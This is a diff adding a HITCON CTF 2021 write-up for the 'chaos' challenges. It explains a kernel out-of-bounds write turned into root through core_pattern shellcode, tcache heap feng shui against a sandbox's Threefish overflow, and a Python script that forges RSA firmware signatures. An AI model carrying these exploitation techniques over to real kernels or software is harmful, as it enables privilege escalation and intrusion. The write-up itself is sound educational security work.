+ structchaos_cmd_desccmd_desc={0};
+
+ // Generate a request ID.
+ intrequest_id=_InterlockedExchangeAdd(&mailbox->request_id,1)+1;
+
+ // Copy the request to the CHAOS memory.
+ intret=chaos_dram_alloc(mailbox->chaos_state->dram_pool,28LL,&dram_request);
+ if(ret!=0){
+ returnret;
+ }
+
+ structchaos_req*dram_req=dram_request.virt_addr;
+ memcpy(dram_req,req,sizeof(structchaos_request));
+
+ structchaos_state*chaos_state=mailbox->chaos_state;
+ uint64_tcmd_tail=chaos_state->csrs.virt_addr->cmd_tail;
+
+ mutex_lock(&mailbox->cmdq_lock);
+ uint64_tcmd_head=chaos_state->csrs.virt_addr->cmd_head;
+
+ // Check if the command queue is already full.
+ if((cmd_head^cmd_tail)==512){
+ mutex_unlock(&mailbox->cmdq_lock);
+ chaos_dram_free(pool,&dram_request);
+ return-16;
+ }
+
+ cmd_desc.req_id=request_id;
+ cmd_desc.unk=1;
+ cmd_desc.buf_offset=dram_request.phys_addr-pool->dram_io_map->phys_addr;
+ cmd_desc.size=28;
+
+ // Add the request to the command queue.
+ memcpy(&mailbox->cmd_queue.virt_addr[cmd_head&0xfffffffffffffdff],&cmd_desc,sizeof(cmd_desc));
+ chaos_state->csrs.virt_addr->cmd_head=(cmd_head+1)&0x3FF;
+ mutex_unlock(p_cmdq_lock);
+
+ // Set the response to pending in the response queue.
+ intresp_idx=request_id&0x1FF;
+ mailbox->responses[resp_index].result=-100;
+
+ // Send an interrupt to the device.
+ chaos_state->csrs.virt_addr->device_irq=1;
+
+ _cond_resched();
+ uint32_tresult=mailbox->responses[resp_index].result;
+ booltimed_out=false;
+
+ // Wait for the request to complete.
+ if(result==-100){
+ longtime_left=2000;
+
+ structwait_queue_entrywq_entry;
+ init_wait_entry(&wq_entry,0);
+
+ prepare_to_wait_event(&mailbox->waitq,&wq_entry,2LL);
+
+ // Wait up to 2000 jiffies.
+ result=mailbox->responses[resp_index].result;
+ while(time_left!=0&&result==-100){
+ time_left=schedule_timeout(time_left);
+ prepare_to_wait_event(&mailbox->waitq,&wq_entry,2LL);
+ result=mailbox->responses[resp_index].result;
+ }
+
+ timed_out=time_left==0&&result==-100;
+ finish_wait(&mailbox->waitq,&wq_entry);
+ }
+
+ chaos_dram_free(pool,&dram_request);
+
+ if(timed_out){
+ return-110;
+ }
+
+ if((result&0x80000000)!=0){
+ dev_err(mailbox->chaos_state->device,"%s: fw returns an error: %d","chaos_mailbox_request",result);
+ return-71;
+ }
+
+ req->out_size=result;
+
+ return0;
+}
+
+
+
This function can write out of bounds of the command queue (which has size 512) if the head index of the command queue is greater than 512. At first glance it looks like this can never happen because the driver always ANDs the value of the head index with 0x3FF when incrementing it and then again with 0xdff when accessing the queue, so the index should always be at most 511. However the driver is not the only component that can modify the head index. The firmware also has access to it and can set it to arbitrary values. The following PoC sets the index to a very big value and panics the kernel with a page fault:
This gives us an out of bounds read/write, which should be enough to completely own the kernel.
+
+
Exploit
+
+
The bug we found gives us an out of bounds write relative to the address of the command queue. The index is 64-bit so we can write to almost any address (bit 9 of the index is cleared before accessing the queue). We can write a 13-byte command descriptor containing predictable data.
+
+
struct__attribute__((packed))chaos_input_rb_desc{
+ // Set by the driver, but predictable.
+ uint16_treq_id;
+ // Always 0
+ uint16_tgap;
+ // Always 1
+ uint8_tunk;
+ // Set by the driver, value between 0 and 0x100000
+ uint32_tbuffer_offset;
+ // Always 28
+ uint32_tbuffer_size;
+};
+
+
+
To get an idea of where our buffer could be and what could be around it we had a look at the kernel’s documentation, which includes a map of the kernel’s address space on x86. The command queue is located in the CHAOS device memory, and the driver uses devm_ioremap to map that region into virtual memory. ioremap allocates virtual memory from the vmalloc region (0xffffc90000000000-0xffffe90000000000 on x86_64), so the ring buffer will be somewhere in that region. After looking around in GDB for a while we noticed that the kernel stack of our process is also located there. This makes sense, because the kernel’s stacks are also allocated from the vmalloc region by default. However even more importantly it looked like the kernel’s stack is at a constant, or at least predictable, offset from the command queue. This means that we should be able to reliably overwrite a specific value saved on the stack with contorlled data without needing any leaks.
+
+
There are many ways to exploit this. The target VM has no SMEP and no SMAP, which means that we can redirect any kernel data and code pointers to memory controlled by us in userspace. With some trial and error to figure out which offsets would overwrite what value, we found that offset 0x13b13b13b13ad88c reliably overwrites a saved rbp on the kernel’s stack. This value depends on what other vmalloc allocations the kernel did before running the exploit so it’s somewhat specific to the setup we used but it works reliably. The overwrite clears the top 16 bits of the saved rbp, which redirects it to a userspace address. We can mmap this address and gain control of the kernel’s stack as soon as the kernel executes a leave instruction. We then only have to fill the fake stack with a pointer to some shellcode.
The shellcode is pretty simple: it reads the IA32_LSTAR, which contains the address of the system call handler, to recover address of the kernel and then overwrites core_pattern with the path to our exploit. It then executes swapgs; sysret to return to userspace. The exploit returns to userspace at an invalid address and crashes, which runs the core dump handler, which is now our exploit itself. The core dump handler runs as root, so our exploit can read the flag and print it to the serial console.
Flag: hitcon{so this is how we attack kernel from a device}
+
+
Part 3: Sandbox
+
+
Analysis
+
+
The flag for part 3 is also a file outside the sandbox. However unlike in part 1, there is no system call that copies the flag into the CHAOS memory for us. The sandbox only opens the file that contains the third flag, but then doesn’t do anything with it. Clearly this means that we must somehow pwn the sandbox and read the contents of the file somewhere into shared memory where our firmware can access them. As we mentioned before, the sandbox has some system calls that let the chip perform some cryptographic operations on data supplied by the firmware. More specifically, the sandbox implements the following:
+
+
+
MD5
+
SHA256
+
AES encrypt/decrypt
+
RC4 encrypt/decrypt
+
Blowfish encrypt/decrypt
+
Twofish encrypt/decrypt
+
Threefish encrypt/decrypt
+
+
+
Except for MD5 and SHA256, all of these operations also need a key. The client can use the add_key and delete_key to add and remove keys from the sandbox’s key storage. The key storage is implemented as a std::map<uint32_t, struct buffer>, which maps a key ID to the key data and is implemented using a search tree.
+
+
Now, except for MD5, SHA256 and RC4 all of the algorithms implemented in the sandbox are block ciphers, which take a fixed-size block of input and produce a block of output having the same size as the input. The block size is usually a fixed value chosen by the designers of the algorithm.
+
+
Consider now the function that implements Threefish encryption, which has a block size of 32 bytes:
While the function checks that the size of the input is not bigger than the block size, it doesn’t check that it’s exactly equal to the block size. On top of that it allocates an output buffer whose size is the same as the size of the input, rather than a fixed-size buffer. This means that the encryption can write out of bounds if we pass it an input buffer that is smaller than 32 bytes. All block ciphers have this bug but it’s only exploitable with threefish because it’s the only cipher with a block size greater than 24 bytes, which is the smallest usable buffer returned by glibc’s malloc. This bug gives us a 8-byte out of bounds read and an 8 byte out of bounds write on a heap chunk of size 24 (the input data is also assumed to be 32 bytes).
+
+
Ok, so we have a heap overflow and overread, how can we exploit this? Fortunately, if we do overflow, we do so directly into the size field of the next chunk. Therefore, our goal was to overflow the size field of a small chunk with a large size. However, there were a bunch of complications before achieving this.
+
+
The biggest issue we were facing, is the fact that both encryption and decryption do not (directly) allow for a controlled overflow. Encryption, of course, leads to mostly gibberish in the overflown area. Furthermore, since our input also has to be smaller than 32 bytes, part of the encryption input is from the next heap chunk! This also makes it nontrivial to get a controlled overflow with decryption, since we do not control part of the encrypted input, that will be decrypted.
+
+
The intended solution here, was to use crypto to your advantage and figure out a way, such that known but not controlled input also decrypts to something you wanted. However, we found a much easier approach, that did not involve pinging our crypto people on discord ;).
+
+
We first present the heap setup we want to have, then how we actually achieved that.
+The basic setup we need, is the following, where the three separate parts of the heap, can be anywhere.
+
+
+
+
The sizes shown are the actual sizes used by malloc (so rounded up to the nearest 0x10).
+Furthermore, except the sizes for the input / output chunks, the other sizes are not particularly specific.
+However, we do need to have sizeof(L) >> sizeof(S). The goal is to now roughly have the following happen 1:
In particular, the purpose of the different chunks are as follows:
+
+
+
$I_E$: input to the threefish encryption using overflow. The encryption will read the size of the next chunk $L$ oob, as the last 8 bytes of input.
+
$O_E$ / $I_D$: output of the threefish encryption, but then also input of the threefish decryption. During encryption, the size of the next chunk will be overwritten. During decryption, the size of the next chunk will be read oob, as the last 8 bytes of input.
+
$O_D$: output of the threefish decryption. The size of the next chunk will be overwritten, with the last 8 bytes of output.
+
$L$: A large chunk. We will overwrite the size of $S$, with this size.
+
$D$: A chunk that is never freed. Since we corrupt the size with the encryption, we do not want to free it, otherwise malloc is unhappy.
+
$S$: A small chunk. Target for our overwrite.
+
+
+
This works out well, since we do not change the input of our encryption before decryption, the output of the decryption must be the same as our initial input. Since the initial input’s last 8 bytes was a large size, the small size of $S$ will be overwritten with this large size. If we now allocate $S$, free it again, it will be in the tcache of a much larger size than it should be. We can then allocate a chunk of size $0x150$ and get back $S$. Then we have a fully controlled overflow of a much larger area of the heap.
+
+
This whole procedure is shown in the image below:
+
+
+
+
So our goal is now clear, we need the specific heap layout and allocations mentioned before.
+But how do we get there?
+
+
There are two major pain points in trying to achieve this.
+Firstly, the heap is not in a clean state when we start our exploit, since the firmware loading also uses the heap already.
+Secondly, there are no good malloc and free primitives. To get the heap into a certain state, ideally we would be able to malloc and free arbitrary sizes. The best primitive we found, was the addition and removal of keys. While it allows us to malloc an arbitrarily sized chunk and free it later, it also has a major drawback. The malloc of the size we control, happens in between a malloc(0x10) and a malloc(0x30). The former to act as a kind of wrapper around our malloc’d buffer, the latter as the node in a red-black-tree. This is the case, because the different keys are saved inside an std::map.
+
+
Astute readers will have noticed, that the wrapper struct is actually of the same size as our target buffers to overflow.
+In fact, both of these pain points can help us out in certain ways.
+
+
We will now show the heap feng shui of our exploit, then explain why the different allocations work and how they help us towards our goal. But first, we explain the do_malloc and do_free functions. These correspond to adding and removing a key respectively. As such, a simplified view of these is basically:
Since do_malloc first allocs a chunk of size 0x20, then our desired size, we can use it as a primitive for achieving the three parts of the heap we need, as long as the two mallocs happen from a contiguous region. Thankfully, the firmware was allocated as a large heap chunk and after freeing it, put in the unsorted bin. Therefore, as long as our allocation size’s tcache is empty, the malloc happens contiguously from this unsorted bin. Hence, our chunks from before can be identified:
This also explains the very first allocation. It is done to remove the single 0x20 chunk currently in the tcache.
+inp_prepare then corresponds to our first heap part, the first input buffer and the large chunk.
+dont_free corresponds to the second heap part, while small to the third.
+Both reserved_for_later use a key_buf chunk on the tcache, while the tree_node will be allocated just after our small chunk.
+This will be our target for overwriting with the controlled overflow later.
+
+
Finally, we have to do some freeing to get our tcache in the correct order. In the end, we would like the have the following tcache for 0x20:
+
+
head -> inp_prepare.buffer -> dont_free.buffer -> small.buffer
+
+
+
To this end, we first swap the buffer struct used for dont_free and first. Otherwise, we would have to free dont_free.key_buf, which we do not want! For that, we first free it temporarily, leading to the following tcache 0x20:
+
+
head -> first.buffer -> dont_free.buffer
+
+
+
Furthermore, dont_free.key_buf is the head of tcache 0x70. Therefore, do_malloc(0x70), will use first.buffer as the buffer, and dont_free.key_buf as its key_buf. Since we never touch the result of this malloc (dont_free2) again, we can be safe that dont_free.key_buf (or as named above $D$) is never freed! Lastly, dont_free_begin.buffer now points to dont_free.buffer and hence the last three frees achieve exactly the tcache layout we want.
+
+
Therefore, the next part of our exploit looks as follows:
First we encrypt. This will use the first entry in the tcache as input, the second as output. Then we make sure to remove the first entry in the tcache. Next we decrypt, and again first entry in tcache is input (previously of course our output), the second as output. This all leads to our desired goal, of smashing the size of small.key_buf with 0x160.
+
+
We now malloc and free small.key_buf, to put it onto the correct tcache:
This will now do the following for the tcache of size 0x40 (remember those chunk’s tree_node were allocated after small.key_buf):
+
+
head -> reserved_for_later.tree_node -> reserved_for_later2.tree_node -> ...
+
+
+
When we now overflow small.key_buf, we can set fd of the chunks that are in tcache.
+Due to the way the allocations work, we need to create some fake chunks first, which we point to.
+The fake chunks are created as follows inside dram:
+
+
puts("Creating fake chunks");
+
+uint64_t*fake_chunk=dram+0x20000;
+uint64_t*fake_chunk2=dram+0x20080;
+fake_chunk[-1]=0x41;
+fake_chunk[0]=fake_chunk2;
+fake_chunk[1]=0;
+
+fake_chunk2[-1]=0x41;
+// this is the address we actually wanna overwrite
+fake_chunk2[0]=fd_addr;
+fake_chunk2[1]=0;
+
+uint64_t*fake_chunk4=dram+0x20100;
+fake_chunk4[-1]=0x21;
+fake_chunk4[0]=0;
+fake_chunk4[1]=0;
+
+uint64_t*fake_chunk3=dram+0x20180;
+fake_chunk3[-1]=0x21;
+fake_chunk3[0]=fake_chunk4;
+fake_chunk3[1]=0;
+
+
+
Now we can finally overflow:
+
+
puts("smashing actual chunks");
+
+memset(overwrite,'A',sizeof(overwrite));
+
+uint64_t*over=&overwrite[0];
+
+// Due to the free of the reserved_for_later chunks
+// We also need to fixup these buffer chunks on the heap.
+over[31]=0x21;
+over[32]=fake_chunk3;
+over[33]=0;
+// This is our actual target!
+over[23]=0x41;
+over[24]=fake_chunk;
+over[25]=0;
+
+size_tmy_key=add_key(overwrite,sizeof(overwrite));
+
+
+
The tcache for 0x20 and 0x40 now looks as follows:
+
+
head[0x20]->reserver_for_later.buffer->fake_chunk3->fake_chunk4
+head[0x40]->fake_chunk->fake_chunk2->fd_addr// location of flag1 file descriptor
+
+
+
Hence, if we create two keys of length 0x30, the second key allocation will be overwriting fd_addr, allowing us to change the file descriptor from flag1 to the one for flag3. Then we can just reuse our exploit for the first flag:
Thanks to david942j and lyc for putting together this series of challenges, they were really fun to solve. You can find the source code for the challenges together with the official solution on github. Until next time!
+
+
+
+
Note that the mallocs will actually happen at different times, this is just to illustrate the basic idea. ↩
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/HITCON-2021/pwn/chaos.md b/HITCON-2021/pwn/chaos.md
new file mode 100755
index 0000000..99c1db5
--- /dev/null
+++ b/HITCON-2021/pwn/chaos.md
@@ -0,0 +1,1055 @@
+# Chaos
+
+**Authors**: [Nspace](https://twitter.com/_MatteoRizzo), [gallileo](https://twitter.com/galli_leo_)
+
+**Tags**: pwn, crypto, kernel, sandbox, heap
+
+**Points**: 334 + 421 + 450
+
+> Let's introduce our brand new device for this cryptocurrency era - CHAOS the CryptograpHy AcceleratOr Silicon!
+>
+> Remote Env: Ubuntu 20.04
+>
+> `nc 52.197.161.60 3154`
+>
+> [chaos-7e0d17f7553a86831ec6f1a5aba6bdb8cfab5674.tar.gz](https://hitcon-2021-quals.s3.ap-northeast-1.amazonaws.com/chaos-7e0d17f7553a86831ec6f1a5aba6bdb8cfab5674.tar.gz)
+
+## Introduction
+
+Last week we played HITCON CTF 2021, one of the hardest events of the year, and placed 4th. During the CTF we (Nspace and gallileo) spent most of our time working on the chaos series of challenges written by [david942j](https://twitter.com/david942j) and lyc. This writeup explains the structure of the challenges and discusses how we solved each of the 3 stages. Out of nearly 300 teams in the CTF, we were the only team to solve all 3 challenges, and the first team to solve chaos-kernel and chaos-sandbox.
+
+Let's get started!
+
+## Challenge architecture
+
+This series of challenges simulates a custom hardware cryptographic accelerator attached to a Linux computer. The setup is fairly complex and has a lot of moving parts:
+
+* A modified QEMU with a custom CHAOS PCI device. The virtual PCI device lets the guest interact with the emulated CHAOS chip.
+* A Linux VM running inside QEMU. The VM loads a driver for the CHAOS chip, called `chaos.ko`, into the kernel. Userspace programs can talk to CHAOS through the driver.
+* A userspace CHAOS client that uses CHAOS to perform cryptographic operations.
+* A firmware binary that runs on the emulated CHAOS chip.
+* A sandbox binary that emulates the CHAOS chip and runs the firmware.
+
+The following image shows an overview all the components and how they interact.
+
+![CHAOS challenge architecture](chaos1.jpg)
+
+There are 3 challenges in the series, each with a different flag:
+
+* chaos-firmware (10 solves, 334 points): the flag is in a file outside the VM (`flag_fiwmare`).
+* chaos-kernel (3 solves, 421 points): the flag is in a file inside the VM that only root can read.
+* chaos-sandbox (2 solves, 450 points): the flag is in a file outside the VM (`flag_sandbox`).
+
+### CHAOS virtual device
+
+CHAOS is a virtual cryptographic accelerator attached to the PCI bus of the virtual machine. It exposes 2 PCI memory resources to the VM: a MMIO area with 16 registers (`csrs`), and 1 MB of dedicated on-chip memory (`dram`). The VM can interact with CHAOS by reading and writing to these two memory regions and CHAOS can send interrupts to the VM. The implementation is split in 3 parts: a virtual PCI device in QEMU, a sandbox binary, and some firmware that runs on the virtual chip.
+
+The PCI device in QEMU doesn't do much. At startup it allocates space for the two memory regions using `memfd` and launches the sandbox binary. The QEMU process and the sandbox share the two memfds and two eventfds used to signal interrupts. After startup, the virtual PCI device is only used to send interrupts to the VM or the sandbox and to handle the VM's memory accesses.
+
+### CHAOS sandbox
+
+The sandbox does the actual chip emulation, so it's more interesting. At startup it mmaps the two shared memory areas, opens two flag files (`flag_firmware` and `flag_sandbox`), and waits until the VM sends it the firmware. Once the VM sends the firmware, the sandbox validates it, forks, and runs the firmware in the child process. The sandbox ptraces the firmware process and uses `PTRACE_SYSEMU` to intercept all the system calls made by the firmware. The firmware's system calls are not handled by the kernel, but by the sandbox. This lets the sandbox implement a custom syscall interface for the firmware, and prevents the firmware from directly accessing files or other system resources.
+
+The sandbox implements only a few system calls:
+
+* `exit` stops the firmware and sends the exit code back to the VM. The sandbox restarts the firmware on the next memory access from the VM.
+* `add_key` and `delete_key` add and remove cryptographic keys supplied by the firmware to the sandbox's key storage.
+* `do_crypto` performs a cryptographic operation on data supplied by the firmware and returns the result to the firmware.
+* `get_flag` reads `flag_firmware` into the chip's memory.
+
+### CHAOS firmware
+
+The firmware is a flat x86_64 binary, which runs in a child process of the sandbox. Since it runs under ptrace with `PTRACE_SYSEMU`, it cannot directly make system calls to the kernel, but must do so through the sandbox. The firmware is not executed with `execve`, but simply loaded in memory and jumped to. It executes in a copy of the sandbox's memory space, so it has direct access to the MMIO area and the CHAOS device memory.
+The challenge has an example firmware, but also lets us provide our own firmware, which can be an arbitrary binary up to 10 kB in size. The sandbox will refuse to load a firmware image unless it passes a RSA signature check.
+
+### CHAOS driver
+
+`chaos.ko` is a Linux kernel-mode driver that interfaces with the virtual CHAOS chip over PCI. It is responsible for managing the CHAOS chip's memory, loading the firmware, servicing interrupts, and providing userspace programs with an interface to the CHAOS chip. The userspace interface uses a misc character device (`/dev/chaos`) and exposes two IOCTLs:
+
+* ALLOC_BUFFER allocates a buffer of a given size in the CHAOS chip's memory. This can only be done once per open file. After calling this ioctl the client can access the buffer by mmapping the file descriptor.
+* DO_REQUEST sends a request to perform a cryptographic operation to the CHAOS chip, waits for the request to complete, and then returns.
+
+The chip side of the interface uses two ring buffers: a command queue and response queue. The command queue contains request descriptors, which specify what operation CHAOS should perform. Each request descriptor contains a pointer to the input data in the CHAOS memory, the size of the data, an opcode, and a request ID. The response queue contains response descriptors (request ID and status code). After enqueuing a new request, the driver signals a mailbox in the CHAOS MMIO area, which makes the sandbox run the firmware, and the blocks.
+
+When the firmware returns, the virtual PCI device raises an interrupt, which processes the request, then wakes up the request threads. When a blocked request thread sees that the chip completed its request, it unblocks and returns the result to userspace.
+
+### CHAOS client
+
+The last piece is the client, a regular Linux binary which runs in userspace in the VM. The client can interact with CHAOS through the interface exposed by the driver at `/dev/chaos`. Just like with the firmware, the challenge provides an example client, but also lets us use our own which can be an arbitrary binary up to 1 MB in size. Unlike the firmware, the client doesn't have to pass a signature check. The client runs as an unprivileged user, so it cannot read the flag inside the VM.
+
+## Preparation
+
+Since the challenge setup is quite complex with a lot of moving parts, we wanted to reduce the complexity and make debugging easier. Since Part 1 and Part 3 can ignore the kernel module and QEMU for the most part, we wrote a script to launch the sandbox binary standalone.
+
+The setup is quite simple, we create the memfds and eventfds in python, then use `pwntools` to spawn the sandbox process. We also have some utility functions for "interacting" with the memory regions. The script shown below already uses part of the solution for Part 1. It also already contains more "advanced" firmware features we added for Part 3, being an output buffer so we can use `printf` inside the firmware.
+
+```python
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+from pwn import *
+# for type info in vscode
+from pwnlib.tubes.process import process
+from pwnlib import gdb, context
+from pwnlib.elf import ELF
+from ctypes import *
+import os
+import memfd
+from pwn import *
+from hashlib import sha256
+from math import prod
+from skein import threefish
+import twofish
+
+def memfd_create(name, flags):
+ return memfd.memfd_create(name, flags)
+
+# whatever
+libc = cdll.LoadLibrary("libc.so.6")
+def eventfd(init_val, flags):
+ return libc.eventfd(init_val, flags)
+
+# Set up pwntools for the correct architecture
+exe = context.binary = ELF('sandbox')
+
+# SETUP LOCAL ENV
+csr_fd = memfd_create("dev-csr", 0)
+log.info("csr_fd: %d", csr_fd)
+os.truncate(csr_fd, 0x80)
+dram_fd = memfd_create("dev-dram", 0)
+log.info("dram_fd: %d", dram_fd)
+os.truncate(dram_fd, 0x100000)
+evtfd_to_dev = eventfd(0, 0)
+log.info("evtfd_to_dev: %d", evtfd_to_dev)
+evtfd_from_dev = eventfd(0, 0)
+
+def preexec():
+ # WARNING: using log.* stuff inside the preexec functions can cause hangs, no idea why
+ # log.info("Before executing, setting up the filedescriptors")
+ os.dup2(csr_fd, 3)
+ os.dup2(dram_fd, 4)
+ os.dup2(evtfd_to_dev, 5)
+ os.dup2(evtfd_from_dev, 6)
+ # log.info("Finished with duplicating filedesc")
+
+def wait_for_interrupt():
+ log.debug("Waiting for interrupt from device")
+ res = os.read(evtfd_from_dev, 8)
+ log.debug("Got 0x%x", u64(res))
+ return res
+
+def send_interrupt(val = 1):
+ log.debug("Sending interrupt with val 0x%x", val)
+ os.write(evtfd_to_dev, p64(val))
+
+def write_mem(fd, off, val: bytes):
+ log.debug("Writing to %d @ 0x%x: %s", fd, off, hexdump(val))
+ os.lseek(fd, off, os.SEEK_SET)
+ os.write(fd, val)
+
+def write_mem_64(fd, off, val: int):
+ write_mem(fd, off, p64(val))
+
+def read_mem(fd, off, size) -> bytes:
+ log.debug("Reading from %d @ 0x%x", fd, off)
+ os.lseek(fd, off, os.SEEK_SET)
+ return os.read(fd, size)
+
+def read_mem_64(fd, off) -> int:
+ res = read_mem(fd, off, 8)
+ return u64(res)
+
+def load_firmware(data, dram_off = 0):
+ log.info("Loading firmware of size 0x%x, dram @ 0x%x", len(data), dram_off)
+ # mapping firmware directly at beginning of dram, hopefully that's ok lmao
+ write_mem(dram_fd, dram_off, data)
+ write_mem_64(csr_fd, 0, dram_off)
+ write_mem_64(csr_fd, 8, len(data))
+ send_interrupt()
+ res = wait_for_interrupt()
+ int_val = u64(res)
+ log.info("Got interrupt: 0x%x", int_val) # should be > 0x1336
+ load_res = read_mem_64(csr_fd, 0)
+ log.info("Got result for loading: 0x%x", load_res)
+
+def build_firmware(shellcode):
+ header = p32(len(shellcode))
+ header += p8(0x82)
+ header += bytes.fromhex("0fff0ee945bd4176f55a40543b3666843a0d565c339e5d8969fcd7ca921cc303a1c8af16240c4d032d1931632b90996dd48aebacee307d3c57bc83375698ae7df90d10163edee9e067ce46e738092257dafb15b80fb65961900deffa9b59b57e472bf56be0d9f648ad6908f2553be13a9ea0cda24317756cba5142a95e21f9e000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
+
+ factors = [13, 691267, 20502125755394762434933579089125449307897345968084091731229436353808955447773787435286551243437724264561546459801643475331591701959705793105612360650011316069145033629055595572330904990306691542449400499839249687299626423918040370229280752606812185791663127069532707770334540305571214081730144598191170073
+ ]
+ phi=prod([i-1 for i in factors])
+ dec=pow(0x10001,-1,phi)
+ act = int.from_bytes(sha256(shellcode).digest(), "little")
+ header += int.to_bytes(pow(act, dec, prod(factors)), 256, 'little')
+ return header + shellcode
+
+OUT_OFF = 0x50000
+
+def read_outputbuf():
+ ret = b""
+ off = OUT_OFF
+ while True:
+ curr = read_mem(dram_fd, off, 1)
+ if curr == b"\0":
+ break
+ ret += curr
+ off += 1
+ return ret
+
+def start(argv=[], *a, **kw):
+ '''Start the exploit against the target.'''
+ p = process([exe.path] + argv, *a, **kw)
+ if args.GDB:
+ gdb.attach(p, gdbscript=gdbscript)
+ return p
+
+# Specify your GDB script here for debugging
+# GDB will be launched if the exploit is run via e.g.
+# ./exploit.py GDB
+gdbscript = '''
+continue
+'''.format(**locals())
+
+#===========================================================
+# EXPLOIT GOES HERE
+#===========================================================
+# Arch: amd64-64-little
+# RELRO: Full RELRO
+# Stack: Canary found
+# NX: NX enabled
+# PIE: PIE enabled
+
+io = start(preexec_fn=preexec, close_fds=False)
+
+# to allow attaching
+if args.PAUSE:
+ pause()
+
+DRAM_START = 0x10000000
+
+# sh = shellcraft.syscall(0xC89FC, arg0=DRAM_START + 0x1000)
+# sh += shellcraft.syscall(60, 0)
+
+# asm_sh = asm(sh)
+
+import subprocess
+
+subprocess.check_call(['make'])
+firm = read("./firmware")
+# firm = build_firmware(asm_sh)
+load_firmware(firm)
+
+log.info("Firmware read ok => launching firmware now!")
+send_interrupt()
+
+wait_for_interrupt()
+# pause()
+log.info("Got interrupt, firmware is done now!")
+
+output = read_outputbuf()
+
+log.info("Output buffer of firmware is:\n%s", hexdump(output))
+
+log.info("As string:\n%s", output.decode("ascii", errors='ignore'))
+
+io.interactive()
+```
+
+## Part 1: Firmware
+
+The firmware can request the flag for this challenge from the
+sandbox by using the `get_flag` syscall, and then write it to the CHAOS memory where our client in userspace can read it. Unfortunately the provided firmware never uses this system call, so there is no way to get the flag without either pwning the firmware from userspace or creating our own firmware that gets the flag and passes the RSA signature check. Since the challenge is in both the crypto and the pwn category and we can supply our own firmware, we tried to look for a way to bypass the signature check. This is the function that validates the firmware:
+
+```c
+struct firmware_header {
+ uint32_t size;
+ uint8_t key_size;
+ uint8_t key[255];
+ uint8_t signature[256];
+ uint8_t data[];
+};
+
+static const uint8_t pubkey[] = { /*...*/ };
+
+void load_firmware(void)
+{
+ uint32_t firmware_offset; // esi
+ uint32_t firmware_size; // eax
+ firmware_header *firmware; // rbx
+ unsigned int key_size; // er14
+ buffer *p_result; // rcx
+ buffer *p_firm_sha; // rax
+ buffer *v7; // rdx
+ unsigned int size; // ebp
+ unsigned int signature_size; // ebx
+ uint8_t *sha_data; // r12
+ uint8_t *x; // rax
+ int rsa_e; // [rsp+Ch] [rbp-29Ch] BYREF
+ buffer firm_data; // [rsp+10h] [rbp-298h] BYREF
+ buffer firm_sha; // [rsp+20h] [rbp-288h] BYREF
+ buffer n; // [rsp+30h] [rbp-278h] BYREF
+ buffer signature; // [rsp+40h] [rbp-268h] BYREF
+ buffer e; // [rsp+50h] [rbp-258h] BYREF
+ buffer result; // [rsp+60h] [rbp-248h] BYREF
+ firmware_header header; // [rsp+70h] [rbp-238h] BYREF
+
+ firmware_offset = csr[0];
+ firmware_size = csr[1];
+
+ // Size/bounds checks
+ if (firmware_size <= 0x204) {
+ csr[0] = -22;
+ return;
+ }
+
+ firmware = &dram_file.data[firmware_offset];
+ memcpy(&header, firmware, sizeof(header));
+ if (header.size + sizeof(header) != firmware_size || header.size > firmware_data.size ) {
+ csr[0] = -22;
+ return;
+ }
+
+ make_buffer(&firm_data, firmware->data, header.size);
+ calc_sha256(&firm_sha, &firm_data);
+
+ // Check the public key that signed the firmware.
+ key_size = header.key_size;
+ make_buffer(&n, firmware->key, header.key_size);
+ if (memcmp(n.data, pubkey, 128)) {
+ csr[0] = -129;
+ return;
+ }
+
+ make_buffer(&signature, firmware->signature, key_size);
+
+ // Verify the signature.
+ rsa_e = 0x10001;
+ make_buffer(&e, &rsa_e, 4);
+ do_rsa_encrypt(&result, &n, &e, &signature);
+
+ p_result = &result;
+ p_firm_sha = &firm_sha;
+ while (1) {
+ size = p_firm_sha->size;
+ signature_size = p_result->size;
+ if ( size >= signature_size )
+ break;
+ v7 = p_firm_sha;
+ p_firm_sha = p_result;
+ p_result = v7;
+ }
+
+ sha_data = p_firm_sha->data;
+ if (!memcmp(sha_data, p_result->data, signature_size)) {
+ x = &sha_data[signature_size];
+ while (size > signature_size) {
+ if (*x++) {
+ goto fail;
+ }
+ ++signature_size;
+ }
+
+ // Firmware valid
+ memcpy(firmware_data.data, firm_data.data, firm_data.size);
+ csr[0] = 0x8000000000000000LL;
+ return;
+ }
+
+fail:
+ csr[0] = -74;
+}
+```
+
+The firmware verifies only the first 128 bytes of N, but N can be up to 255 bytes long, with the size controlled by us. Furthermore, there are no checks that N is actually a product of two primes. This means that we can sign the firmware with our own RSA key as long as the first 128 bytes of the modulus match the key accepted by the sandbox.
+
+In short, we have to find a number $N'$ that is equal to the challenge's $N$ in the lowest 128 bytes such that $\phi(N')$ is easy to compute. Once we have $\phi(N')$ we can compute the private key and sign our own firmware. The intended solution is to look for a prime $N'$, since then $\phi(N') = N' - 1$, but we didn't think about this during the CTF and instead looked for a composite $N'$ that was easy to factor by setting bits above 1024.
+
+Our teammate Aaron eventually found that $N' = (N \mod 2^{1024}) + 2^{1034}$ works and factors to 13 * 691267 * 20502125755394762434933579089125449307897345968084091731229436353808955447773787435286551243437724264561546459801643475331591701959705793105612360650011316069145033629055595572330904990306691542449400499839249687299626423918040370229280752606812185791663127069532707770334540305571214081730144598191170073. This script produces a valid signature for an arbitrary binary:
+
+```py
+from pwn import *
+from hashlib import sha256
+from math import prod
+
+context.arch = "amd64"
+shellcode = read('shellcode.bin')
+
+header = p32(len(shellcode))
+header += p8(0x82)
+header += bytes.fromhex("0fff0ee945bd4176f55a40543b3666843a0d565c339e5d8969fcd7ca921cc303a1c8af16240c4d032d1931632b90996dd48aebacee307d3c57bc83375698ae7df90d10163edee9e067ce46e738092257dafb15b80fb65961900deffa9b59b57e472bf56be0d9f648ad6908f2553be13a9ea0cda24317756cba5142a95e21f9e000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
+
+factors = [13, 691267, 20502125755394762434933579089125449307897345968084091731229436353808955447773787435286551243437724264561546459801643475331591701959705793105612360650011316069145033629055595572330904990306691542449400499839249687299626423918040370229280752606812185791663127069532707770334540305571214081730144598191170073]
+phi=prod([i-1 for i in factors])
